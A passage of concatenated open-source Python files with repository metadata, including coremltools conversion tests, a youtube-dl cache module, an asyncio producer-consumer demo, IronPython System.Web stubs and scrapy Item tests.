def extract_profile(self, profile_name):
return self.profile
def traced_grid_2d_list_from(self, grid, plane_index_limit=None):
return [self.positions]
def magnification_2d_via_hessian_from(self, grid, deflections_func=None):
return self.magnification
def einstein_radius_from(self, grid):
return self.einstein_radius
def einstein_mass_angular_from(self, grid):
return self.einstein_mass
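# --- Hedged usage sketch (illustrative only; not part of the original module) ---
# Why: shows how a test might configure the point-source tracer double above.
# Assumptions (not from the source): the numeric values are arbitrary.
#
# tracer = MockTracerPoint(magnification=2.0, einstein_radius=1.5)
# assert tracer.magnification_2d_via_hessian_from(grid=None) == 2.0
# assert tracer.einstein_radius_from(grid=None) == 1.5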
|
e6c1635111e5a6e05aea90dd485b31c8d07e2943
|
40195e6f86bf8620850f0c56e98eae5693e88277
|
/coremltools/converters/mil/frontend/tensorflow2/test/test_v2_load.py
|
376abf2de1e32469ad89334740d2b13d5c4f804a
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
apple/coremltools
|
009dfa7154d34cab8edcafa618e689e407521f50
|
feed174188f7773631a3d574e1ff9889a135c986
|
refs/heads/main
| 2023-09-01T23:26:13.491955
| 2023-08-31T18:44:31
| 2023-08-31T18:44:31
| 95,862,535
| 3,742
| 705
|
BSD-3-Clause
| 2023-09-14T17:33:58
| 2017-06-30T07:39:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,970
|
py
|
test_v2_load.py
|
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import os
import shutil
import tempfile
import pytest
import coremltools.converters as converter
from coremltools.converters.mil.frontend.tensorflow.test.test_load import \
frontend
from coremltools.converters.mil.frontend.tensorflow.test.testing_utils import \
get_tf_keras_io_names
from coremltools.converters.mil.input_types import TensorType
from coremltools.converters.mil.testing_reqs import backends
tf = pytest.importorskip("tensorflow", minversion="2.1.0")
class TestTf2ModelFormats:
def setup(self):
self.saved_model_dir = tempfile.mkdtemp()
_, self.model_path_h5 = tempfile.mkstemp(
suffix=".h5", prefix=self.saved_model_dir
)
def teardown(self):
if os.path.exists(self.saved_model_dir):
shutil.rmtree(self.saved_model_dir)
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_model(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
mlmodel = converter.convert(
keras_model,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_saved_model_file(self, backend):
keras_model = tf.keras.Sequential(
[
tf.keras.layers.Flatten(input_shape=(28, 28), batch_size=1),
tf.keras.layers.Dense(10, activation=tf.nn.relu),
]
)
keras_model.save(self.saved_model_dir, save_format="tf")
mlmodel = converter.convert(
self.saved_model_dir, outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_h5_file(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
keras_model.save(self.model_path_h5, save_format="h5")
mlmodel = converter.convert(
self.model_path_h5,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_hdf5_file(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
keras_model.save(self.model_path_h5, save_format="h5")
mlmodel = converter.convert(
self.model_path_h5,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_concrete_function_list_from_tf_low_level_api(self, backend):
root = tf.train.Checkpoint()
root.v1 = tf.Variable(3.0)
root.v2 = tf.Variable(2.0)
root.f = tf.function(lambda x: root.v1 * root.v2 * x)
input_data = tf.constant(1.0, shape=[1, 1])
to_save = root.f.get_concrete_function(input_data)
tf.saved_model.save(root, self.saved_model_dir, to_save)
tf_model = tf.saved_model.load(self.saved_model_dir)
concrete_func = tf_model.signatures[
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY
]
mlmodel = converter.convert(
[concrete_func], outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_saved_model_list_from_tf_function(self, backend):
class build_model(tf.Module):
@tf.function(
input_signature=[tf.TensorSpec(shape=[3, 4, 5], dtype=tf.float32)]
)
def __call__(self, x):
return tf.nn.relu(x)
model = build_model()
tf.saved_model.save(model, self.saved_model_dir)
mlmodel = converter.convert(
self.saved_model_dir, outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_concrete_function_list_from_tf_function(self, backend):
class build_model(tf.Module):
@tf.function(
input_signature=[tf.TensorSpec(shape=[3, 4, 5], dtype=tf.float32)]
)
def __call__(self, x):
return tf.nn.relu(x)
model = build_model()
concrete_func = model.__call__.get_concrete_function()
mlmodel = converter.convert(
[concrete_func], outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_graphdef_from_tf_function(self, backend):
class build_model(tf.Module):
def __init__(self):
self.dense = tf.keras.layers.Dense(256, activation="relu")
input_signature = [
tf.TensorSpec(name="input", shape=(
128, 128), dtype=tf.float32),
]
@tf.function(input_signature=input_signature)
def call(self, x):
x = self.dense(x)
return x
model = build_model()
from tensorflow.python.framework.convert_to_constants import \
convert_variables_to_constants_v2
frozen_graph_func = convert_variables_to_constants_v2(
model.call.get_concrete_function())
frozen_graph_def = frozen_graph_func.graph.as_graph_def()
mlmodel = converter.convert(frozen_graph_def, convert_to=backend[0])
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_model_metadata(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
mlmodel = converter.convert(
keras_model,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
metadata_keys = mlmodel.get_spec().description.metadata.userDefined
assert "com.github.apple.coremltools.version" in metadata_keys
assert "com.github.apple.coremltools.source" in metadata_keys
assert "tensorflow==2." in metadata_keys["com.github.apple.coremltools.source"]
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_none(self, backend):
with pytest.raises(NotImplementedError, match="Expected model format: .* .h5"):
converter.convert(None, source=frontend, convert_to=backend[0])
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_invalid_extension(self, backend):
_, invalid_filename = tempfile.mkstemp(suffix=".invalid", prefix=self.saved_model_dir)
with pytest.raises(
ValueError,
match="Input model path should be .h5/.hdf5 file or a directory, but got .*.invalid",
):
converter.convert(invalid_filename, source=frontend, convert_to=backend[0])
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_multiple_concrete_functions(self, backend):
class build_model(tf.Module):
@tf.function(
input_signature=[tf.TensorSpec(shape=[3, 4, 5], dtype=tf.float32)]
)
def __call__(self, x):
return tf.nn.relu(x)
model = build_model()
cf = model.__call__.get_concrete_function()
with pytest.raises(
NotImplementedError, match="Only a single concrete function is supported"
):
converter.convert([cf, cf, cf], source=frontend, convert_to=backend[0])
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_converter_type(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
with pytest.raises(ValueError) as e:
converter.convert(keras_model, source="invalid", convert_to=backend[0])
expected_msg = r'Unrecognized value of argument "source": .*'
e.match(expected_msg)
with pytest.raises(NotImplementedError) as e:
converter.convert(keras_model, convert_to="invalid", source=frontend)
e.match(r"Backend converter .* not implemented")
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_non_exist(self, backend):
non_exist_filename = self.model_path_h5.replace(".h5", "_non_exist.h5")
with pytest.raises(ValueError) as e:
converter.convert(non_exist_filename, source=frontend, convert_to=backend[0])
e.match(r"Input model .* does not exist")
|
e0d8146996356be68632e21671a9bca93a54dec9
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/docstrings/googleNoEmptyLineAfterSummary.py
|
bca70b915a8077246d0c0f64eed06850c1b17010
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 60
|
py
|
googleNoEmptyLineAfterSummary.py
|
def f():
"""Summary.
Returns:
Nothing:
"""
|
c03d126818dc9216a76f741d74821234063aa21f
|
b54f5fe75dbb010a18d1da30a4f030fbb257ed4a
|
/attic/win32/toga_win32/widgets/passwordinput.py
|
708a074d1e7eb3afaad11931759312f6231da60e
|
[
"BSD-3-Clause"
] |
permissive
|
beeware/toga
|
449e3f008ad89e10f8ffcc61bdac798e7e825d09
|
01b076bd6434d0bd04c04ff72ac6eb20b9e973ea
|
refs/heads/main
| 2023-08-24T11:33:53.705165
| 2023-08-24T00:06:09
| 2023-08-24T00:06:09
| 22,529,973
| 1,865
| 468
|
BSD-3-Clause
| 2023-09-14T18:46:58
| 2014-08-01T21:44:10
|
Python
|
UTF-8
|
Python
| false
| false
| 124
|
py
|
passwordinput.py
|
from .textinput import TextInput
from ..libs import *
class PasswordInput(TextInput):
control_style = ES_PASSWORD
|
45af1f444b0c96737a2507fb2645353269c5524b
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs/System/Web.py
|
4a7bc81caefb399cbd6ed81e6933d7bcb4e482c4
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 8,433
|
py
|
Web.py
|
# encoding: utf-8
# module System.Web calls itself Web
# from System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class AspNetHostingPermission(CodeAccessPermission, IPermission, ISecurityEncodable, IStackWalk, IUnrestrictedPermission):
"""
Controls access permissions in ASP.NET hosted environments. This class cannot be inherited.
AspNetHostingPermission(state: PermissionState)
AspNetHostingPermission(level: AspNetHostingPermissionLevel)
"""
def Copy(self):
"""
Copy(self: AspNetHostingPermission) -> IPermission
When implemented by a derived class, creates and returns an identical copy of the current
permission object.
Returns: A copy of the current permission object.
"""
pass
def FromXml(self, securityElement):
"""
FromXml(self: AspNetHostingPermission, securityElement: SecurityElement)
Reconstructs a permission object with a specified state from an XML encoding.
securityElement: The System.Security.SecurityElement containing the XML encoding to use to reconstruct the
permission object.
"""
pass
def Intersect(self, target):
"""
Intersect(self: AspNetHostingPermission, target: IPermission) -> IPermission
When implemented by a derived class, creates and returns a permission that is the intersection
of the current permission and the specified permission.
target: A permission to combine with the current permission. It must be of the same type as the current
permission.
Returns: An System.Security.IPermission that represents the intersection of the current permission and
the specified permission; otherwise, null if the intersection is empty.
"""
pass
def IsSubsetOf(self, target):
"""
IsSubsetOf(self: AspNetHostingPermission, target: IPermission) -> bool
Returns a value indicating whether the current permission is a subset of the specified
permission.
target: The System.Security.IPermission to combine with the current permission. It must be of the same
type as the current System.Security.IPermission.
Returns: true if the current System.Security.IPermission is a subset of the specified
System.Security.IPermission; otherwise, false.
"""
pass
def IsUnrestricted(self):
"""
IsUnrestricted(self: AspNetHostingPermission) -> bool
Returns a value indicating whether unrestricted access to the resource that is protected by the
current permission is allowed.
Returns: true if unrestricted use of the resource protected by the permission is allowed; otherwise,
false.
"""
pass
def ToXml(self):
"""
ToXml(self: AspNetHostingPermission) -> SecurityElement
Creates an XML encoding of the permission object and its current state.
Returns: A System.Security.SecurityElement containing the XML encoding of the permission object,
including any state information.
"""
pass
def Union(self, target):
"""
Union(self: AspNetHostingPermission, target: IPermission) -> IPermission
Creates a permission that is the union of the current permission and the specified permission.
target: A permission to combine with the current permission. It must be of the same type as the current
permission.
Returns: An System.Security.IPermission that represents the union of the current permission and the
specified permission.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, state: PermissionState)
__new__(cls: type, level: AspNetHostingPermissionLevel)
"""
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
Level = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the current hosting permission level for an ASP.NET application.
Get: Level(self: AspNetHostingPermission) -> AspNetHostingPermissionLevel
Set: Level(self: AspNetHostingPermission) = value
"""
class AspNetHostingPermissionAttribute(CodeAccessSecurityAttribute, _Attribute):
"""
Allows security actions for System.Web.AspNetHostingPermission to be applied to code using declarative security. This class cannot be inherited.
AspNetHostingPermissionAttribute(action: SecurityAction)
"""
def CreatePermission(self):
"""
CreatePermission(self: AspNetHostingPermissionAttribute) -> IPermission
Creates a new System.Web.AspNetHostingPermission with the permission level previously set by the
System.Web.AspNetHostingPermissionAttribute.Level property.
Returns: An System.Security.IPermission that is the new System.Web.AspNetHostingPermission.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, action):
""" __new__(cls: type, action: SecurityAction) """
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
Level = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the current hosting permission level.
Get: Level(self: AspNetHostingPermissionAttribute) -> AspNetHostingPermissionLevel
Set: Level(self: AspNetHostingPermissionAttribute) = value
"""
class AspNetHostingPermissionLevel(Enum, IComparable, IFormattable, IConvertible):
"""
Specifies the trust level that is granted to an ASP.NET Web application.
enum AspNetHostingPermissionLevel, values: High (500), Low (300), Medium (400), Minimal (200), None (100), Unrestricted (600)
"""
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): #cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): #cannot find CLR method
pass
def __gt__(self, *args): #cannot find CLR method
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): #cannot find CLR method
pass
def __lt__(self, *args): #cannot find CLR method
pass
def __ne__(self, *args): #cannot find CLR method
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
High = None
Low = None
Medium = None
Minimal = None
None = None
Unrestricted = None
value__ = None
|
a45c2777827ca550c68cf85e4ae0cab92073f51b
|
b18b01b32e67433a6e749e2aae48fb69bcfc42f9
|
/financial_time_series/tensorflow_model/serving_requests/request_random.py
|
0689caa20351c749d2b558cc44ca459857155b9f
|
[
"Apache-2.0"
] |
permissive
|
kubeflow/examples
|
f83c920cb94b32f0271103afb74b3efaaae35b41
|
40cba72b522ca6879672dca24398973c8f0ef32d
|
refs/heads/master
| 2023-09-01T20:39:26.577041
| 2023-08-05T16:51:33
| 2023-08-05T16:51:33
| 119,894,375
| 1,375
| 813
|
Apache-2.0
| 2023-08-30T14:40:56
| 2018-02-01T21:13:10
|
Jsonnet
|
UTF-8
|
Python
| false
| false
| 514
|
py
|
request_random.py
|
""" Module that sends a random request to the tf-server.
Uses numpy random array to obtain a response/prediction from the tf-server.
"""
import numpy as np
from . import request_helper #pylint: disable=relative-beyond-top-level
def send_random_request():
"""Obtain the prediction for a random request (test function for the tf-server)."""
# create random input
input_tensor = np.random.rand(1, 24).astype(np.float32)
# send request
request_helper.send_request(input_tensor)
send_random_request()
|
e6b8619c91d4e7dafd200e947cf22fe8bb0009d1
|
f167dffa2f767a0419aa82bf434852069a8baeb8
|
/lib/youtube_dl/cache.py
|
54123da0e7ea4fe8693c04227eaa6905d9dd1ae7
|
[
"MIT"
] |
permissive
|
firsttris/plugin.video.sendtokodi
|
d634490b55149adfdcb62c1af1eb77568b8da3f5
|
1095c58e2bc21de4ab6fcb67a70e4f0f04febbc3
|
refs/heads/master
| 2023-08-18T10:10:39.544848
| 2023-08-15T17:06:44
| 2023-08-15T17:06:44
| 84,665,460
| 111
| 31
|
MIT
| 2022-11-11T08:05:21
| 2017-03-11T16:53:06
|
Python
|
UTF-8
|
Python
| false
| false
| 3,763
|
py
|
cache.py
|
from __future__ import unicode_literals
import errno
import json
import os
import re
import shutil
import traceback
from .compat import (
compat_getenv,
compat_open as open,
)
from .utils import (
error_to_compat_str,
expand_path,
is_outdated_version,
try_get,
write_json_file,
)
from .version import __version__
class Cache(object):
_YTDL_DIR = 'youtube-dl'
_VERSION_KEY = _YTDL_DIR + '_version'
_DEFAULT_VERSION = '2021.12.17'
def __init__(self, ydl):
self._ydl = ydl
def _get_root_dir(self):
res = self._ydl.params.get('cachedir')
if res is None:
cache_root = compat_getenv('XDG_CACHE_HOME', '~/.cache')
res = os.path.join(cache_root, self._YTDL_DIR)
return expand_path(res)
def _get_cache_fn(self, section, key, dtype):
assert re.match(r'^[a-zA-Z0-9_.-]+$', section), \
'invalid section %r' % section
assert re.match(r'^[a-zA-Z0-9_.-]+$', key), 'invalid key %r' % key
return os.path.join(
self._get_root_dir(), section, '%s.%s' % (key, dtype))
@property
def enabled(self):
return self._ydl.params.get('cachedir') is not False
def store(self, section, key, data, dtype='json'):
assert dtype in ('json',)
if not self.enabled:
return
fn = self._get_cache_fn(section, key, dtype)
try:
try:
os.makedirs(os.path.dirname(fn))
except OSError as ose:
if ose.errno != errno.EEXIST:
raise
write_json_file({self._VERSION_KEY: __version__, 'data': data}, fn)
except Exception:
tb = traceback.format_exc()
self._ydl.report_warning(
'Writing cache to %r failed: %s' % (fn, tb))
def _validate(self, data, min_ver):
version = try_get(data, lambda x: x[self._VERSION_KEY])
if not version: # Backward compatibility
data, version = {'data': data}, self._DEFAULT_VERSION
if not is_outdated_version(version, min_ver or '0', assume_new=False):
return data['data']
self._ydl.to_screen(
'Discarding old cache from version {version} (needs {min_ver})'.format(**locals()))
def load(self, section, key, dtype='json', default=None, min_ver=None):
assert dtype in ('json',)
if not self.enabled:
return default
cache_fn = self._get_cache_fn(section, key, dtype)
try:
try:
with open(cache_fn, 'r', encoding='utf-8') as cachef:
return self._validate(json.load(cachef), min_ver)
except ValueError:
try:
file_size = os.path.getsize(cache_fn)
except (OSError, IOError) as oe:
file_size = error_to_compat_str(oe)
self._ydl.report_warning(
'Cache retrieval from %s failed (%s)' % (cache_fn, file_size))
except IOError:
pass # No cache available
return default
def remove(self):
if not self.enabled:
self._ydl.to_screen('Cache is disabled (Did you combine --no-cache-dir and --rm-cache-dir?)')
return
cachedir = self._get_root_dir()
if not any((term in cachedir) for term in ('cache', 'tmp')):
raise Exception('Not removing directory %s - this does not look like a cache dir' % cachedir)
self._ydl.to_screen(
'Removing cache dir %s .' % cachedir, skip_eol=True)
if os.path.exists(cachedir):
self._ydl.to_screen('.', skip_eol=True)
shutil.rmtree(cachedir)
self._ydl.to_screen('.')
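# --- Hedged usage sketch (illustrative only; not part of the original module) ---
# Why: shows a store/load round trip through the Cache API above. Assumptions (not
# from the source): `ydl` is a YoutubeDL instance whose 'cachedir' param is not
# False, and the section/key names are made up for illustration.
#
# cache = Cache(ydl)
# cache.store('myextractor', 'some-token', {'token': 'abc'})
# data = cache.load('myextractor', 'some-token', default={})
# print(data)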
|
8cc91793e7da2f10d689924453848cd3f917d0d8
|
529e713a78e82de2ae5d44cfb8ef209e0894d72a
|
/asyncio-walkthrough/asyncq.py
|
debf5a3a809e3a731acd3617b5f1b0cebee5d154
|
[
"MIT"
] |
permissive
|
realpython/materials
|
cd2f548276be2c82f134ca03eadb1cd279e0f26e
|
d2d62756d3854f54a12a767f2bf9470486c0ceef
|
refs/heads/master
| 2023-09-05T22:12:29.806738
| 2023-08-31T20:56:28
| 2023-08-31T20:56:28
| 132,374,697
| 4,678
| 6,482
|
MIT
| 2023-09-12T22:22:06
| 2018-05-06T20:46:18
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,899
|
py
|
asyncq.py
|
#!/usr/bin/env python3
# asyncq.py
import asyncio
import itertools as it
import os
import random
import time
async def makeitem(size: int = 5) -> str:
return os.urandom(size).hex()
async def seconds() -> float:
return time.perf_counter()
async def randint(a: int, b: int) -> int:
return random.randint(a, b)
async def randsleep(a: int = 1, b: int = 5, caller=None) -> None:
i = await randint(a, b)
if caller:
print(f"{caller} sleeping for {i} seconds.")
await asyncio.sleep(i)
async def produce(name: int, q: asyncio.Queue) -> None:
n = await randint(1, 5)
for _ in it.repeat(None, n): # Synchronous
await randsleep(caller=f"Producer {name}")
i = await makeitem()
t = await seconds()
await q.put((i, t))
print(f"Producer {name} added <{i}> to queue.")
async def consume(name: int, q: asyncio.Queue) -> None:
while True:
await randsleep(caller=f"Consumer {name}")
i, t = await q.get()
now = await seconds()
print(
f"Consumer {name} got element <{i}>" f" in {now-t:0.5f} seconds."
)
q.task_done()
async def main(nprod: int, ncon: int):
q = asyncio.Queue()
producers = [asyncio.create_task(produce(n, q)) for n in range(nprod)]
consumers = [asyncio.create_task(consume(n, q)) for n in range(ncon)]
await asyncio.gather(*producers)
await q.join()
for c in consumers:
c.cancel()
if __name__ == "__main__":
import argparse
random.seed(444)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--nprod", type=int, default=5)
parser.add_argument("-c", "--ncon", type=int, default=10)
ns = parser.parse_args()
start = time.perf_counter()
asyncio.run(main(**ns.__dict__))
elapsed = time.perf_counter() - start
print(f"Program completed in {elapsed:0.5f} seconds.")
|
2c926b29d6c880bb898ee7adad8cf4bd365f4569
|
f4f704f309849a8e476bfeffa68b17ac228df04d
|
/documentation/test_python/inspect_underscored/inspect_underscored/__init__.py
|
f7e3e269911edb99e14e0845002f613fe855e54b
|
[
"MIT"
] |
permissive
|
mosra/m.css
|
3d0c3c2f7b93039eb529e154e59ff8d91d45e88d
|
c34e8608973548c5e3d31d65cbfdd5b2fc42a59e
|
refs/heads/master
| 2023-08-17T09:48:14.652793
| 2023-08-09T15:34:09
| 2023-08-09T15:34:09
| 95,897,280
| 414
| 118
|
MIT
| 2022-10-03T03:52:50
| 2017-06-30T14:42:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
__init__.py
|
"""..
:data _DATA_IN_MODULE: In-module documented underscored data. This won't be
picked up by the initial crawl, unfortunately, as the docstrings are
processed much later.
"""
import enum
from . import _submodule, _submodule_external, _submodule_undocumented
class _Class:
"""Documented underscored class"""
class _ClassExternal: pass
class _ClassUndocumented: pass
class _Enum(enum.Enum):
"""Documented underscored enum"""
class _EnumExternal(enum.Enum): pass
class _EnumUndocumented(enum.Enum): pass
def _function():
"""Documented undercored function"""
def _function_external(): pass
def _function_undocumented(): pass
_DATA_IN_MODULE: int = 0
_DATA_EXTERNAL: int = 1
_DATA_EXTERNAL_IN_MODULE: int = 2
_DATA_UNDOCUMENTED: int = 3
class Class:
"""..
:property _property_in_class: In-class documented underscored property.
This won't be picked up by the initial crawl, unfortunately, as the
docstrings are processed much later.
:data _DATA_IN_CLASS: In-class documented underscored data. This won't be
picked up by the initial crawl, unfortunately, as the docstrings are
processed much later.
:data _DATA_DECLARATION_IN_CLASS: In-class documented underscored data.
This won't be picked up by the initial crawl, unfortunately, as the
docstrings are processed much later.
"""
def _function(self):
"""Documented underscored function"""
def _function_external(self): pass
def _function_undocumented(self): pass
@property
def _property(self):
"""Documented underscored property"""
@property
def _property_in_class(self): pass
@property
def _property_external(self): pass
@property
def _property_external_in_class(self): pass
@property
def _property_undocumented(self): pass
_DATA_IN_CLASS: int = 4
_DATA_EXTERNAL: int = 5
_DATA_EXTERNAL_IN_CLASS: int = 6
_DATA_UNDOCUMENTED: int = 7
_DATA_DECLARATION_IN_CLASS: float
_DATA_DECLARATION_EXTERNAL: float
_DATA_DECLARATION_EXTERNAL_IN_CLASS: float
_DATA_DECLARATION_UNDOCUMENTED: float
|
a74b9becad438da165acdbed29a97de75204b7db
|
3ee5bf329a2e58eb9f775ec5ee6a329fd3541e36
|
/tests/test_item.py
|
ce2b4fd15e275b676314bd9ae5a426a40aba978f
|
[
"BSD-3-Clause"
] |
permissive
|
scrapy/scrapy
|
53bd79e500e2cb7441d33bfd61ba003962d5fb46
|
cddb8c15d66831dc4e1bc4b745fcc6c534bb03dc
|
refs/heads/master
| 2023-08-31T04:08:06.193342
| 2023-08-30T18:29:54
| 2023-08-30T18:29:54
| 529,502
| 47,472
| 12,120
|
BSD-3-Clause
| 2023-09-14T12:08:07
| 2010-02-22T02:01:14
|
Python
|
UTF-8
|
Python
| false
| false
| 8,991
|
py
|
test_item.py
|
import unittest
from unittest import mock
from scrapy.item import ABCMeta, Field, Item, ItemMeta
class ItemTest(unittest.TestCase):
def assertSortedEqual(self, first, second, msg=None):
return self.assertEqual(sorted(first), sorted(second), msg)
def test_simple(self):
class TestItem(Item):
name = Field()
i = TestItem()
i["name"] = "name"
self.assertEqual(i["name"], "name")
def test_init(self):
class TestItem(Item):
name = Field()
i = TestItem()
self.assertRaises(KeyError, i.__getitem__, "name")
i2 = TestItem(name="john doe")
self.assertEqual(i2["name"], "john doe")
i3 = TestItem({"name": "john doe"})
self.assertEqual(i3["name"], "john doe")
i4 = TestItem(i3)
self.assertEqual(i4["name"], "john doe")
self.assertRaises(KeyError, TestItem, {"name": "john doe", "other": "foo"})
def test_invalid_field(self):
class TestItem(Item):
pass
i = TestItem()
self.assertRaises(KeyError, i.__setitem__, "field", "text")
self.assertRaises(KeyError, i.__getitem__, "field")
def test_repr(self):
class TestItem(Item):
name = Field()
number = Field()
i = TestItem()
i["name"] = "John Doe"
i["number"] = 123
itemrepr = repr(i)
self.assertEqual(itemrepr, "{'name': 'John Doe', 'number': 123}")
i2 = eval(itemrepr)
self.assertEqual(i2["name"], "John Doe")
self.assertEqual(i2["number"], 123)
def test_private_attr(self):
class TestItem(Item):
name = Field()
i = TestItem()
i._private = "test"
self.assertEqual(i._private, "test")
def test_raise_getattr(self):
class TestItem(Item):
name = Field()
i = TestItem()
self.assertRaises(AttributeError, getattr, i, "name")
def test_raise_setattr(self):
class TestItem(Item):
name = Field()
i = TestItem()
self.assertRaises(AttributeError, setattr, i, "name", "john")
def test_custom_methods(self):
class TestItem(Item):
name = Field()
def get_name(self):
return self["name"]
def change_name(self, name):
self["name"] = name
i = TestItem()
self.assertRaises(KeyError, i.get_name)
i["name"] = "lala"
self.assertEqual(i.get_name(), "lala")
i.change_name("other")
self.assertEqual(i.get_name(), "other")
def test_metaclass(self):
class TestItem(Item):
name = Field()
keys = Field()
values = Field()
i = TestItem()
i["name"] = "John"
self.assertEqual(list(i.keys()), ["name"])
self.assertEqual(list(i.values()), ["John"])
i["keys"] = "Keys"
i["values"] = "Values"
self.assertSortedEqual(list(i.keys()), ["keys", "values", "name"])
self.assertSortedEqual(list(i.values()), ["Keys", "Values", "John"])
def test_metaclass_with_fields_attribute(self):
class TestItem(Item):
fields = {"new": Field(default="X")}
item = TestItem(new="New")
self.assertSortedEqual(list(item.keys()), ["new"])
self.assertSortedEqual(list(item.values()), ["New"])
def test_metaclass_inheritance(self):
class ParentItem(Item):
name = Field()
keys = Field()
values = Field()
class TestItem(ParentItem):
keys = Field()
i = TestItem()
i["keys"] = 3
self.assertEqual(list(i.keys()), ["keys"])
self.assertEqual(list(i.values()), [3])
def test_metaclass_multiple_inheritance_simple(self):
class A(Item):
fields = {"load": Field(default="A")}
save = Field(default="A")
class B(A):
pass
class C(Item):
fields = {"load": Field(default="C")}
save = Field(default="C")
class D(B, C):
pass
item = D(save="X", load="Y")
self.assertEqual(item["save"], "X")
self.assertEqual(item["load"], "Y")
self.assertEqual(D.fields, {"load": {"default": "A"}, "save": {"default": "A"}})
# D class inverted
class E(C, B):
pass
self.assertEqual(E(save="X")["save"], "X")
self.assertEqual(E(load="X")["load"], "X")
self.assertEqual(E.fields, {"load": {"default": "C"}, "save": {"default": "C"}})
def test_metaclass_multiple_inheritance_diamond(self):
class A(Item):
fields = {"update": Field(default="A")}
save = Field(default="A")
load = Field(default="A")
class B(A):
pass
class C(A):
